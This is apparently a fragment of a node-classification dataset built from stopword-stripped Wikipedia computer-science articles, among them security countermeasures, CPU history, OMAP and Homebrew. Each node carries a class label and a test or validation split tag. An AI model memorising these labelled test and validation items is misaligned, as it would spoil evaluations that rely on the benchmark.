    "text": "Countermeasure_(computer):countermeasure computer computer security countermeasure action device procedure technique reduces threat vulnerability attack eliminating preventing minimizing harm cause discovering reporting corrective action taken definition ietf rfc 2828 cnss instruction 4009 dated 26 april 2010 committee national security systems united states america according glossary infosectoday meaning countermeasure synonym security control telecommunications communication countermeasures defined security services part osi reference model itu-t x.800 recommendation x.800 iso iso 7498-2 information processing systems – open systems interconnection – basic reference model – part 2 security architecture technically aligned following picture explain relationships concepts terms resource physical logical one vulnerabilities exploited threat agent threat action result potentially compromises confidentiality integrity availability properties resources potentially different vulnerable one organization others involved parties customers suppliers so-called cia triad basis information security attack active attempts alter system resources affect operation compromises integrity availability passive attack attempts learn make use information system affect system resources compromising confidentiality threat potential violation security exists circumstance capability action event could breach security cause harm threat possible danger enabling exploitation vulnerability threat either intentional i.e. intelligent e.g. individual cracker criminal organization accidental e.g. possibility computer malfunctioning possibility act god earthquake fire tornado set policies concerned information security management information security management systems isms developed manage according risk management principles countermeasures order accomplish security strategy set following rules regulations applicable country potential malicious actor physical access computer system greater chance inflicting harm upon devices usb killer may used damage render completely unusable anything connection motherboard computer usb port video port ethernet port serial port without proper protection devices may result destruction ports adapter cards storage devices ram motherboards cpus anything physically connected device attacked monitors flash drives wired switches types devices even used damage smartphones cars well threat mitigated installing restricting physical access easily accessible ports situations necessary port-closing lock permanently disables access port short actual port disassembled necessary port accessible optocoupler allow port send receive data computer device without direct electrical connection preventing computer device receiving dangerous voltage external device unsecured scenario malicious actor may steal destroy storage devices hard drives ssds resulting destruction theft valuable data data storage device longer necessary data theft best prevented physically destroying shredding storage device data storage device use must secured one use encryption encrypt contents storage device even encrypt whole storage device save master boot record device unlocked password biometric authentication physical dongle network interchange one-time password combination thereof device boot drive however must unencrypted pre-boot environment operating system accessed striping breaking data chunks stored upon multiple drives must assemble order access data possible solution physical drive theft provided drives stored multiple individually secured locations enough number one drive used piece together meaningful information neglected process adding physical barriers storage devices locked cases physically hidden drives limited amount personnel knowledge access keys locations may prove good first line physical theft",
    "neighbors": [
      5636,
      5774,
      3473,
      4755,
      2709,
      4117,
      5404,
      7979,
      11567,
      8881,
      1088,
      1479,
      11594,
      2383,
      4689,
      9688,
      4062,
      10207,
      3552,
      612,
      7526,
      7528,
      10092,
      7151,
      7794,
      5373,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1370,
    "label": 3,
    "text": "Maziacs:maziacs maziacs action adventure maze game published dk'tronics 1983 zx spectrum commodore 64 msx maziacs written priestley based earlier zx81 game mazogs published bug byte 1982 mazogs one successful zx81 games priestley adapted higher-resolution colour-screen zx spectrum msx commodore 64 port written andy french maziacs takes place randomly generated scrolling overhead-view maze player-controlled protagonist must find gold exit level gold placed least 200 moves start position maze patrolled monsters called maziacs prisoners sometimes found walls maze highlight path gold short period time moving maze fighting maziacs decreases player energy replenished finding food main game screen shows one fiftieth maze view mode expands view show one twelfth whilst mode useful scouting purposes player move whilst viewing maziacs killed effectively swords several found maze used sword carried time gold last two factors lead tactic avoiding groups maziacs killing many possible collecting gold maziacs supported currah microspeech peripheral maziacs published critical reception good crash magazine awarded 82 highlighting appealing graphics animation retrospective later year crash criticized slightly unresponsive keyboard controls felt less addictive continued praise animation techniques maziacs ranked number 99 sinclair official top 100 zx spectrum games time game claustrophobic atmosphere choreographed animation general character",
    "neighbors": [
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 1371,
    "label": 1,
    "text": "Copac:copac copac originally acronym consortium online public access catalogues union catalogue provided free access merged online catalogues many major research libraries specialist libraries united kingdom ireland plus british library national library scotland national library wales 40 million records around 90 libraries representing wide range materials across subject areas copac freely available widely used users mainly coming higher education institutions united kingdom also worldwide copac valued users research tool copac searchable web browser z39.50 client also accessible openurl search/retrieve via url sru interfaces interfaces used provide links items copac external sites used institute historical research website copac jisc service provided uk community basis agreement research libraries uk rluk service uses records supplied rluk members well increasing range specialist libraries collections national research interest full list contributors available including national trust places historic interest natural beauty royal botanic gardens kew middle temple library institution mechanical engineers imeche library july 2019 jisc replaced copac library hub discover",
    "neighbors": [
      3979,
      140
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1372,
    "label": 8,
    "text": "Yahoo!_Site_Explorer:yahoo site explorer yahoo site explorer yse yahoo service allowed users view information websites yahoo search index service closed november 21 2011 merged bing webmaster tools tool similar google search console previously google webmaster tools particular useful finding information backlinks pointing given webpage domain yse offered full timely backlink reports site merging bing webmaster tools service offers full backlink reports sites owned webmaster reports sites owned webmaster limited 1,000 links webmasters added special authentication code websites also allowed",
    "neighbors": [
      2945,
      488,
      5193,
      3836,
      8735
    ],
    "mask": "None"
  },
  {
    "node_id": 1373,
    "label": 4,
    "text": "Norwegian_Cyber_Defence_Force:norwegian cyber defence force norwegian cyber defence force branch norwegian armed forces responsible military communications defensive cyberwarfare norway force employs 1,500 people located 60 locations main base jørstadmoen lillehammer secondary base kolsås outside oslo cyber defence established branch 18 september 2012",
    "neighbors": [
      4848,
      4435,
      9688,
      8400
    ],
    "mask": "Test"
  },
  {
    "node_id": 1374,
    "label": 3,
    "text": "KDL:kdl kdl term used beos/haiku possibly operating systems serious kernel error causes computer drop kernel debugger kdl stands kernel debug ger land kdl brought buggy driver crucial filesystem driver escaped command 'es usually leaves user needing reboot",
    "neighbors": [
      7983,
      3312,
      3631,
      6236,
      9374
    ],
    "mask": "Test"
  },
  {
    "node_id": 1375,
    "label": 9,
    "text": "POSXML:posxml posxml acronym point sale extended markup language programming language based xml used create applications pos terminal normally programming language used develop applications c c++ main purpose posxml simplify development applications pos terminals contains set instructions pre-programmed commands allow direct interaction machine resulting large reduction application development time posxml organized structured form tags showing levels subsets set commands instructions form logical structure posxml application example similar vast majority existing programming languages posxml compiled specific format reduce file size allows application run pos terminal using framework virtual machine compiled program written posxml becomes set bytecodes interpreted virtual machine pos terminal results implementation pos terminal example compiled bytecode commands instructions posxml compliance use capital letters lowercase letters case sensitive acquired training commands belong language require parameters unlike commands need input interact machine examples commands require instructions parameters commands require instructions parameters interact equipment names given functions variables pages also obey rules written capital letters lowercase letters developer creates function called calcula_digito able call variable via calcula_digito call function variable page must meet exact name assigned programmer structured language based xml posxml language constantly evolving new commands instructions added library time initially language two dozen basic commands create functional application pos terminal using resources basic display lcd keypad magnetic card reader printer evolution language almost one hundred commands instructions available deal files pictures mathematical operators functions manipulate variables string type definition variables logical operators classes working protocol iso 8583 protocol standard exchanging information transactions credit cards among others tens commands instructions complete set language variables posxml typed two types integer string posxml limits number declared variables 512 variables declared global i.e shared throughout scheduled pages posxml program runtime process examples string type variable integer type variable call variable declared memory made name_of_the_variable regardless type also possible convert variable one type type posxml commands inttostring stringtoint used examples writing application pos terminal developer faced need write specific file system equipment posxml language works files type walk dbfile file system defined framework interprets program compiled posxml file system walk dbfile uses format key buffer n key buffer n basically format text files unix environment n used wrap 8 basic commands posxml language work files pos terminal examples",
    "neighbors": [
      7411,
      2045,
      8262,
      479
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1376,
    "label": 3,
    "text": "History_of_general-purpose_CPUs:history general-purpose cpus history general-purpose cpus continuation earlier history computing hardware early 1950s computer design unique upward-compatible machines computer architectures multiple differing implementations programs written one machine would run kind even kinds company major drawback large body software developed run computers starting programming scratch seen large barrier design freedom time important designers constrained cost electronics starting explore computer could best organized basic features introduced period included index registers ferranti mark 1 return address saving instruction univac immediate operands ibm 704 detecting invalid operations ibm 650 end 1950s commercial builders developed factory-constructed truck-deliverable computers widely installed computer ibm 650 used drum memory onto programs loaded using either paper punched tape punched cards high-end machines also included core memory provided higher speeds hard disks also starting grow popular computer automatic abacus type number system affects way works early 1950s computers built specific numerical processing tasks many machines used decimal numbers basic number system mathematical functions machines worked base-10 instead base-2 common today merely binary coded decimal bcd machines ten vacuum tubes per digit processor register early soviet computer designers implemented systems based ternary logic bit could three states +1 0 -1 corresponding positive zero negative voltage early project u.s. air force binac attempted make lightweight simple computer using binary arithmetic deeply impressed industry late 1970 major computer languages unable standardize numeric behavior decimal computers groups users large alienate even designers used binary system still many odd ideas used sign-magnitude arithmetic -1 10001 ones complement -1 11110 rather modern two complement arithmetic -1 11111 computers used six-bit character sets adequately encoded hollerith punched cards major revelation designers period realize data word multiple character size began design computers 12- 24- 36-bit data words e.g. see tx-2 era grosch law dominated computer design computer cost increased square speed one major problem early computers program one would work others computer companies found customers little reason remain loyal given brand next computer bought would incompatible anyway point concerns usually price performance 1962 ibm tried new approach designing computers plan make family computers could run software different performances different prices users needs grew could move larger computers still keep investment programs data storage media designed one reference computer named system/360 s/360 virtual computer reference instruction set abilities machines family would support provide different classes machines computer family would use less hardware emulation less microprogram emulation create machine able run full s/360 instruction set instance low-end machine could include simple processor low cost however would require use larger microcode emulator provide rest instruction set would slow high-end machine would use much complex processor could directly process s/360 design thus running much simpler faster emulator ibm chose consciously make reference instruction set quite complex capable even though computer complex control store holding microprogram would stay relatively small could made fast memory another important effect one instruction could describe quite complex sequence operations thus computers would generally fetch fewer instructions main memory could made slower smaller less costly given mix speed price s/360 successor scientific machines like 7090 data processing machines like 1401 needed design could reasonably support forms processing hence instruction set designed manipulate simple binary numbers text scientific floating-point similar numbers used calculator binary coded decimal arithmetic needed accounting systems almost following computers included innovations form basic set features called complex instruction set computing cisc pronounced sisk term invented many years later reduced instruction set computing risc began get market share many ciscs instruction could access either registers memory usually several different ways made ciscs easier program programmer could remember thirty hundred instructions set three ten addressing modes rather thousands distinct instructions called orthogonal instruction set pdp-11 motorola 68000 architecture examples nearly orthogonal instruction sets also bunch burroughs univac ncr control data corporation honeywell competed ibm time however ibm dominated era s/360 burroughs corporation later merged sperry/univac form unisys offered alternative s/360 burroughs large systems b5000 series 1961 b5000 virtual memory symmetric multiprocessing multiprogramming operating system master control program mcp written algol 60 industry first recursive-descent compilers early 1963 mosfet metal-oxide-semiconductor field-effect transistor also known mos transistor invented mohamed atalla dawon kahng bell labs 1959 demonstrated 1960 led development metal-oxide-semiconductor mos integrated circuit ic proposed kahng 1961 fabricated fred heiman steven hofstein rca 1962 high scalability much lower power consumption higher density bipolar junction transistors mosfet made possible build high-density integrated circuits advances mos integrated circuit technology led development large-scale integration lsi chips late 1960s eventually invention microprocessor early 1970s 1960s development electronic calculators electronic clocks apollo guidance computer minuteman missile helped make mos integrated circuits economical practical late 1960s first calculator clock chips began show small computers might possible large-scale integration lsi culminated invention microprocessor single-chip cpu intel 4004 released 1971 first commercial microprocessor origins 4004 date back busicom project began japanese calculator company busicom april 1968 engineer masatoshi shima tasked designing special-purpose lsi chipset along supervisor tadashi tanba use busicom 141-pf desktop calculator integrated printer initial design consisted seven lsi chips including three-chip cpu design included arithmetic units adders multiplier units registers read-only memory macro-instruction set control decimal computer system busicom wanted general-purpose lsi chipset desktop calculators also equipment teller machine cash register billing machine shima thus began work general-purpose lsi chipset late 1968 sharp engineer tadashi sasaki also became involved development conceived single-chip microprocessor 1968 discussed concept brainstorming meeting held japan sasaki attributes basic invention break calculator chipset four parts rom 4001 ram 4002 shift registers 4003 cpu 4004 unnamed woman software engineering researcher nara women college present meeting sasaki first meeting robert noyce intel 1968 presented woman four-division chipset concept intel busicom busicom approached american company intel manufacturing help 1969 intel memory company back facilities manufacture high density silicon gate mos chip busicom required shima went intel june 1969 present design proposal due intel lacking logic engineers understand logic schematics circuit engineers convert intel asked shima simplify logic intel wanted single-chip cpu design influenced sharp tadashi sasaki presented concept busicom intel 1968 single-chip microprocessor design formulated intel marcian ted hoff 1969 simplifying shima initial design four chips including single-chip cpu due hoff formulation lacking key details shima came ideas find solutions implementation shima responsible adding 10-bit static shift register make useful printer buffer keyboard interface many improvements instruction set making ram organization suitable calculator memory address information transfer key program area performance program capacity functional specification decimal computer idea software desktop calculator logic real-time i/o control data exchange instruction accumulator general purpose register hoff shima eventually realized 4-bit microprocessor concept together help intel stanley mazor interpret ideas shima hoff specifications four chips developed period months 1969 intel team led hoff busicom team led shima late 1969 shima returned japan intel done work project early 1970 shima returned intel early 1970 found work done 4004 since left hoff moved projects week shima returned intel federico faggin joined intel become project leader shima explained project faggin worked together design 4004 thus chief designers chip faggin created design methodology silicon-based chip design hoff formulated architecture moving projects shima produced initial busicom design assisted development final intel design 4004 first introduced japan microprocessor busicom 141-pf calculator march 1971 north america first public mention 4004 advertisement november 15 1971 edition electronic news nec released μpd707 μpd708 two-chip 4-bit cpu 1971 followed nec first single-chip microprocessor μpd700 april 1972 prototype μcom-4 μpd751 released april 1973 combining μpd707 μpd708 single microprocessor 1973 toshiba released tlcs-12 first 12-bit microprocessor first commercial microprocessor binary coded decimal bcd based intel 4004 released busicom intel 1971 march 1972 intel introduced microprocessor 8-bit architecture 8008 integrated pmos logic re-implementation transistor–transistor logic ttl based datapoint 2200 cpu 4004 designers federico masatoshi shima went design successor intel 8080 slightly mini computer-like microprocessor largely based customer feedback limited 8008 much like 8008 used applications terminals printers cash registers industrial robots however able 8080 also became original target cpu early de facto standard personal computer operating system called cp/m used demanding control tasks cruise missiles many uses released 1974 8080 became one first really widespread microprocessors mid-1970s use integrated circuits computers common decade marked market upheavals caused shrinking price transistors became possible put entire cpu one printed circuit board result minicomputers usually 16-bit words 4k 64k memory became common ciscs believed powerful types computers microcode small could stored high-speed memory cisc architecture also addressed semantic gap perceived defined distance machine language higher level programming languages used program machine felt compilers could better job richer instruction set custom ciscs commonly constructed using bit slice computer logic amd 2900 chips custom microcode bit slice component piece arithmetic logic unit alu register file microsequencer bit-slice integrated circuits 4-bits wide early 1970s pdp-11 developed arguably advanced small computer day almost immediately wider-word ciscs introduced 32-bit vax 36-bit pdp-10 ibm continued make large fast computers however definition large fast meant megabyte ram clock speeds near one megahertz tens megabytes disk drives ibm system 370 version 360 tweaked run virtual computing environments virtual computer developed reduce chances unrecoverable software failure burroughs large systems b5000 b6000 b7000 series reached largest market share stack computer whose os programmed dialect algol different developments competed market share first single-chip 16-bit microprocessor introduced 1975 panafacom conglomerate formed japanese companies fujitsu fuji electric matsushita introduced mn1610 commercial 16-bit microprocessor according fujitsu world first 16-bit microcomputer single chip intel 8080 basis 16-bit intel 8086 direct ancestor today ubiquitous x86 family including pentium core i7 every instruction 8080 direct equivalent large x86 instruction set although opcode values different latter early 1980s researchers uc berkeley ibm discovered computer language compilers interpreters used small subset instructions complex instruction set computing cisc much power cpu ignored real-world use realized making computer simpler less orthogonal could make faster less costly time time cpu calculation became faster relation time needed memory accesses designers also experimented using large sets internal registers goal cache intermediate results registers control compiler also reduced number addressing modes orthogonality computer designs based theory called reduced instruction set computing risc riscs usually larger numbers registers accessed simpler instructions instructions specifically load store data memory result simple core cpu running high speed supporting sorts operations compilers using anyway common variant risc design employs harvard architecture versus von neumann architecture stored program architecture common designs harvard architecture machine program data occupy separate memory devices accessed simultaneously von neumann machines data programs mixed one memory device requiring sequential accessing produces so-called von neumann bottleneck one downside risc design programs run tend larger compilers must generate longer sequences simpler instructions perform results since instructions must loaded memory anyway larger code offsets risc design fast memory handling early 1990s engineers japan hitachi found ways compress reduced instruction sets fit even smaller memory systems ciscs compression schemes used instruction set superh series microprocessors introduced 1992 superh instruction set later adapted arm architecture thumb instruction set applications need run older binary software compressed riscs growing dominate sales another approach riscs minimal instruction set computer misc niladic zero-operand instruction set approach realized space instruction used identify operands instruction machines placed operands push-down last-in first stack instruction set supplemented instructions fetch store memory used simple caching provide extremely fast risc machines compact code another benefit interrupt latencies small smaller cisc machines rare trait risc machines burroughs large systems architecture used approach b5000 designed 1961 long term risc invented architecture puts six 8-bit instructions 48-bit word precursor long instruction word vliw design see burroughs architecture one inspirations charles h. moore programming language forth turn inspired later misc chip designs example f20 cores 31 5-bit instructions fit four 20-bit word risc chips dominate market 32-bit embedded systems smaller risc chips even growing common cost-sensitive 8-bit embedded-system market main market risc cpus systems need low power small size even cisc processors based architectures created risc grew dominant newer x86 processors translate instructions internally risc-like instruction set numbers may surprise many market perceived desktop computers x86 designs dominate desktop notebook computer sales computers tiny fraction computers sold people industrialised countries computers embedded systems car house desks mid-to-late 1980s designers began using technique termed instruction pipelining processor works multiple instructions different stages completion example processor retrieve operands next instruction calculating result current one modern cpus may use dozen stages pipelining originally developed late 1950s international business machines ibm 7030 stretch mainframe computer minimal instruction set computers misc execute instructions one cycle need pipelining similar idea introduced years later execute multiple instructions parallel separate arithmetic logic units alus instead operating one instruction time cpu look several similar instructions depend execute parallel approach called superscalar processor design methods limited degree instruction level parallelism ilp number non-dependent instructions program code programs run well superscalar processors due inherent high ilp notably graphics however general problems far less ilp thus lowering possible speedups methods branching one major culprit example program may add two numbers branch different code segment number bigger third number case even branch operation sent second alu processing still must wait results addition thus runs faster one alu common solution type problem use type branch prediction efficiency multiple functional units available superscalar designs operand register dependencies found another limiting factor minimize dependencies out-of-order execution instructions introduced scheme instruction results complete out-of-order must re-ordered program order processor program restartable exception out-of-order execution main advance computer industry 1990s similar concept speculative execution instructions one direction branch predicted direction executed branch direction known branch direction known predicted direction actual direction compared predicted direction correct speculatively executed instructions results kept incorrect instructions results erased speculative execution coupled accurate branch predictor gives large performance gain advances originally developed research risc-style designs allow modern cisc processors execute twelve instructions per clock cycle traditional cisc designs could take twelve cycles execute one instruction resulting instruction scheduling logic processors large complex difficult verify higher complexity needs transistors raising power consumption heat risc superior instructions simpler less interdependence make superscalar implementations easier however intel demonstrated concepts applied complex instruction set computing cisc design given enough time money instruction scheduling logic makes superscalar processor boolean logic early 1990s significant innovation realize coordination multi-alu computer could moved compiler software translates programmer instructions machine-level instructions type computer called long instruction word vliw computer scheduling instructions statically compiler versus scheduling dynamically processor reduce cpu complexity improve performance reduce heat cost unfortunately compiler lacks accurate knowledge runtime scheduling issues merely changing cpu core frequency multiplier effect scheduling operation program determined input data major effects scheduling overcome severe problems vliw system may enhanced adding normal dynamic scheduling losing vliw advantages static scheduling compiler also assumes dynamically generated code uncommon creation java java virtual machine true reasonable assume slow compiles would affect software developers just-in-time compilation jit virtual machines used many languages slow code generation affects users also several unsuccessful attempts commercialize vliw basic problem vliw computer scale different price performance points dynamically scheduled computer another issue compiler design vliw computers difficult compilers 2005 often emit suboptimal code platforms also vliw computers optimise throughput low latency unattractive engineers designing controllers computers embedded machinery embedded systems markets often pioneered computer improvements providing large market unconcerned compatibility older software january 2000 transmeta corporation took novel step placing compiler central processing unit making compiler translate reference byte code case x86 instructions internal vliw instruction set method combines hardware simplicity low power speed vliw risc compact main memory system software reverse-compatibility provided popular cisc intel itanium chip based call explicitly parallel instruction computing epic design design supposedly provides vliw advantage increased instruction throughput however avoids issues scaling complexity explicitly providing bundle instructions information concerning dependencies information calculated compiler would vliw design early versions also backward-compatible newer x86 software means on-chip emulator mode integer performance disappointing despite improvements sales volume markets continue low current designs work best computer running one program however nearly modern operating systems allow running multiple programs together cpu change work another program needs costly context switching contrast multi-threaded cpus handle instructions multiple programs cpus include several sets registers context switch occurs contents working registers simply copied one set registers purpose designs often include thousands registers instead hundreds typical design downside registers tend somewhat costly chip space needed implement chip space might used otherwise purpose intel calls technology hyperthreading offers two threads per core current core i3 core i7 core i9 desktop lineup well core i3 core i5 core i7 mobile lineup well offering four threads per core high-end xeon phi processors multi-core cpus typically multiple cpu cores die connected via shared l2 l3 cache on-die bus on-die crossbar switch cpu cores die share interconnect components interface processors rest system components may include front side bus interface memory controller interface dynamic random access memory dram cache coherent link processors non-coherent link southbridge i/o devices terms multi-core microprocessor unit mpu come general use one die multiple cpu cores one way work around von neumann bottleneck mix processor dram one chip another track development combine reconfigurable logic general-purpose cpu scheme special computer language compiles fast-running subroutines bit-mask configure logic slower less-critical parts program run sharing time cpu process allows creating devices software radios using digital signal processing perform functions usually performed analog electronics lines hardware software increasingly blur due progress design methodology availability chips field-programmable gate arrays fpga cheaper production processes even open source hardware begun appear loosely knit communities like opencores risc-v recently announced fully open cpu architectures openrisc readily implemented fpgas custom produced chips anyone license fees even established processor makers like sun microsystems released processor designs e.g. opensparc open-source licenses yet another option clockless asynchronous cpu unlike conventional processors clockless processors central clock coordinate progress data pipeline instead stages cpu coordinated using logic devices called pipe line controls fifo sequencers basically pipeline controller clocks next stage logic existing stage complete thus central clock unneeded relative clocked logic may easier implement high performance devices asynchronous logic asynchronous logic proponents believe abilities would benefits biggest disadvantage clockless cpu cpu design tools assume clocked cpu synchronous circuit making clockless cpu designing asynchronous circuit involves modifying design tools handle clockless logic extra testing ensure design avoids metastability problems even several asynchronous cpus built including one promising option eliminate front side bus modern vertical laser diodes enable change theory optical computer components could directly connect holographic phased open-air switching system would provide large increase effective speed design flexibility large reduction cost since computer connectors also likely failure points busless system may reliable 2010 modern processors use 64- 128-bit logic optical wavelength superposition could allow data lanes logic many orders magnitude higher electronics added space copper wires another long-term option use light instead electricity digital logic theory could run 30 faster use less power allow direct interface quantum computing devices main problems approach foreseeable future electronic computing elements faster smaller cheaper reliable elements already smaller wavelengths light thus even waveguide-based optical logic may uneconomic relative electronic logic 2016 development effort electronic circuitry early experimental work done using ion based chemical reactions instead electronic photonic actions implement elements logic processor relative conventional register machine stack machine architecture yet similar intel itanium architecture temporal register addressing scheme proposed ivan godard company intended greatly reduce complexity cpu hardware specifically number internal registers resulting huge multiplexer trees somewhat harder read debug general-purpose register names aids understanding view belt moving conveyor belt oldest values drop belt vanish implemented mill architecture",
    "neighbors": [
      6656,
      1029,
      7173,
      9739,
      2066,
      7699,
      5655,
      10779,
      10781,
      6181,
      10789,
      8231,
      5677,
      3630,
      10285,
      6705,
      7217,
      7218,
      2623,
      2113,
      7234,
      3142,
      1610,
      2638,
      1122,
      7269,
      3175,
      6250,
      8815,
      7281,
      630,
      7286,
      8822,
      6268,
      3197,
      7313,
      8851,
      6815,
      8352,
      5793,
      6818,
      8355,
      6821,
      1702,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      8900,
      9932,
      5329,
      10966,
      731,
      11487,
      4833,
      7911,
      10985,
      5354,
      5356,
      9964,
      5358,
      1776,
      5872,
      8944,
      757,
      2805,
      10485,
      249,
      3323,
      8700,
      1798,
      1801,
      10508,
      6926,
      6415,
      1298,
      11539,
      8474,
      2339,
      6950,
      3886,
      7983,
      309,
      8501,
      4409,
      5948,
      3904,
      4928,
      8514,
      11075,
      4423,
      6476,
      2383,
      7505,
      9044,
      11604,
      344,
      8543,
      10603,
      4465,
      10612,
      1399,
      7033,
      1402,
      3451,
      3457,
      398,
      3470,
      5518,
      5523,
      407,
      409,
      8090,
      1952,
      8609,
      10658,
      9126,
      10669,
      1967,
      2480,
      9137,
      10675,
      1461,
      1462,
      1463,
      7607,
      4030,
      9665,
      453,
      3014,
      8136,
      466,
      9172,
      1499,
      1502,
      7134,
      5090,
      995,
      7653,
      2535,
      9707,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 1377,
    "label": 3,
    "text": "OMAP:omap omap open multimedia applications platform family developed texas instruments series image/video processors proprietary system chips socs portable mobile multimedia applications omap devices generally include general-purpose arm architecture processor core plus one specialized co-processors earlier omap variants commonly featured variant texas instruments tms320 series digital signal processor platform created december 12 2002 stmicroelectronics texas instruments jointly announced initiative open mobile application processor interfaces omapi intended used 2.5 3g mobile phones going produced 2003 later merged larger initiative renamed mipi alliance omap texas instruments implementation standard stmicroelectronics implementation named nomadik omap enjoy success smartphone tablet market 2011 lost ground qualcomm snapdragon september 26 2012 texas instruments announced would wind operations smartphone tablet oriented chips instead focus embedded platforms november 14 2012 texas instruments announced would cut 1,700 jobs due shift mobile embedded platforms last omap5 chips released q2 2013 omap family consists three product groups classified performance intended application two main distribution channels exist parts available channels genesis omap product line partnership cell phone vendors main distribution channel involves sales directly wireless handset vendors parts developed suit evolving cell phone requirements flexible powerful enough support sales less specialized catalog channels omap 1 parts many omap 3 parts catalog versions different sales support models parts obsolete perspective handset vendors may still needed support products developed using catalog parts distributor-based inventory management parts originally intended use application processors smartphones processors powerful enough run significant operating systems linux android symbian support connectivity personal computers support various audio video applications omap 1 family started ti-enhanced arm core changed standard arm926 core included many variants easily distinguished according manufacturing technology 130 nm except omap171x series cpu peripheral set distribution channel direct large handset vendors catalog-based distributors march 2009 omap1710 family chips still available handset vendors products using omap 1 processors include hundreds cell phone models nokia 770 internet tablets parts marketed handset vendors products using include internet tablets mobile phones 3rd generation omap omap 3 broken 3 distinct groups omap34x omap35x omap36x omap34x omap36x distributed directly large handset cell phone manufacturers omap35x variant omap34x intended catalog distribution channels omap36x 45 nm version 65 nm omap34x higher clock speed omap 3611 found devices like bookeen cybook odyssey licensed crippled version omap 3621 silicon marking officially 3611 sold able drive e-ink screen access iva dsp video technology higher end omap 3 parts derived part davinci product line first packaged higher end c64x+ dsps image processing controllers arm9 processors last seen older omap 1 generation arm cortex-a8 highlighted list omap 3 soc image video audio iva2 accelerator units capabilities devices support 12 megapixel camera images though support 5 3 megapixels support hd imaging 4th generation omaps omap 4430 used google glass 4460 formerly named 4440 4470 use dual-core arm cortex-a9 cpu two arm cortex-m3 cores part ducati sub-system off-loading low-level tasks 4430 4460 use powervr sgx540 integrated 3d graphics accelerator running clock frequency 304 384 mhz respectively 4470 powervr sgx544 gpu supports directx 9 enables use windows 8 well dedicated 2d graphics core increased power efficiency 50-90 omap 4 come iva3 multimedia hardware accelerator programmable dsp enables 1080p full hd multi-standard video encode/decode omap 4 uses arm cortex-a9 arm simd engine media processing engine aka neon may significant performance advantage cases nvidia tegra 2 arm cortex-a9s non-vector floating point units also uses dual-channel lpddr2 memory controller compared nvidia tegra 2 single-channel memory controller 5th generation omap omap 5 soc uses dual-core arm cortex-a15 cpu two additional cortex-m4 cores offload a15s less computationally intensive tasks increase power efficiency two powervr sgx544mp graphics cores dedicated ti 2d bitblt graphics accelerator multi-pipe display sub-system signal processor respectively support 24 20 megapixel cameras front rear 3d hd video recording chip also supports 8 gb dual channel lpddr2/ddr3 memory output four hd 3d displays 3d hdmi 1.4 video output omap 5 also includes three usb 2.0 ports one lowspeed usb 3.0 otg port sata 2.0 controller marketed handset manufacturers intended highly integrated low cost chips consumer products omap-dm series intended used digital media coprocessors mobile devices high megapixel digital still video cameras image signal processor isp used accelerate processing camera images marketed handset manufacturers many newer versions highly integrated use low cost cell phones omap l-1x parts marketed catalog channels different technological heritage omap parts rather deriving directly cell phone product lines grew video-oriented davinci product line removing video-specific features using upgraded davinci peripherals notable feature use floating point dsp instead customary fixed point one hawkboard uses omap-l138 many mobile phones use omap socs including nokia n9 n90 n91 n92 n95 n82 e61 e62 e63 e90 mobile phones well nokia 770 n800 n810 n900 internet tablets motorola droid samsung galaxy tab 2 7.0 droid x droid 2 palm pre pandora touch book also use omap soc omap3430 others use omap soc include sony ericsson satio idou vivaz samsung phones running symbian including omnia hd nook color archos tablets archos 80 gen 9 archos 101 gen 9 kindle fire hd blackberry playbook kobo arc b n nook hd also all-in-one smart displays using omap 4 socs viewsonic vsd220 omap 4430 omap socs also used basis number hobbyist prototyping evaluation boards beagleboard pandaboard omap3 board gumstix presonus digital mixing boards",
    "neighbors": [
      3585,
      7170,
      8720,
      11282,
      9235,
      11289,
      1057,
      38,
      4139,
      8237,
      9774,
      2097,
      6705,
      8250,
      1083,
      8253,
      10303,
      7745,
      7235,
      7747,
      11337,
      2635,
      1615,
      99,
      1644,
      8812,
      11374,
      10361,
      6268,
      638,
      644,
      11396,
      9863,
      8842,
      11405,
      146,
      659,
      1170,
      1682,
      7833,
      666,
      5786,
      4258,
      4259,
      4773,
      9913,
      8383,
      1728,
      9408,
      10945,
      9928,
      4821,
      11485,
      2788,
      3300,
      3301,
      9964,
      2285,
      1776,
      8433,
      6391,
      9978,
      3835,
      2811,
      2814,
      781,
      6925,
      8995,
      5417,
      2862,
      7983,
      7988,
      10548,
      11062,
      823,
      1849,
      6971,
      6978,
      8003,
      10562,
      6981,
      3911,
      11080,
      5963,
      1871,
      1872,
      9042,
      2388,
      6495,
      1377,
      9581,
      5998,
      11629,
      6001,
      373,
      6009,
      8058,
      8577,
      11655,
      392,
      398,
      1424,
      1428,
      4508,
      10658,
      5028,
      7077,
      9638,
      3511,
      9155,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      4569,
      2524,
      9182,
      10725,
      1014,
      3575,
      1533
    ],
    "mask": "Test"
  },
  {
    "node_id": 1378,
    "label": 2,
    "text": "Write_barrier:write barrier operating systems write barrier mechanism enforcing particular ordering sequence writes storage system computer system example write barrier file system mechanism program logic ensures in-memory file system state written persistent storage correct order write barrier garbage collector fragment code emitted compiler immediately every store operation ensure e.g generational invariants maintained write barrier memory system also known memory barrier hardware-specific compiler intrinsic ensures preceding memory operations happen subsequent ones",
    "neighbors": [
      2304,
      2529,
      9762,
      935,
      8680,
      1801,
      7983,
      2066
    ],
    "mask": "Test"
  },
  {
    "node_id": 1379,
    "label": 2,
    "text": "Homebrew_(package_management_software):homebrew package management software homebrew free open-source software package management system simplifies installation software apple macos operating system linux name intended suggest idea building software mac depending user taste originally written max howell package manager gained popularity ruby rails community earned praise extensibility homebrew recommended ease use well integration command line homebrew non-profit project member software freedom conservancy run entirely unpaid volunteers homebrew made extensive use github expand support several packages user contributions 2010 homebrew third-most-forked repository github 2012 homebrew largest number new contributors github 2013 homebrew largest number contributors issues closed project github homebrew spawned several sub-projects linuxbrew linux port officially merged homebrew homebrew cask builds upon homebrew focuses installation gui applications taps dedicated specific areas programming languages like php homebrew written max howell 2009 march 2013 homebrew successfully completed kickstarter campaign raise funds servers test build formulae managed raise december 13 2013 homebrew repository migrated howell github account project account february 2015 due downtime sourceforge resulted binaries unavailable homebrew moved hosting bintray september 21 2016 homebrew version 1.0.0 released december 2018 homebrew maintained team 21 people january 2019 linuxbrew merged back homebrew adding beta support linux windows subsystem linux homebrew ’ feature set february 2 2019 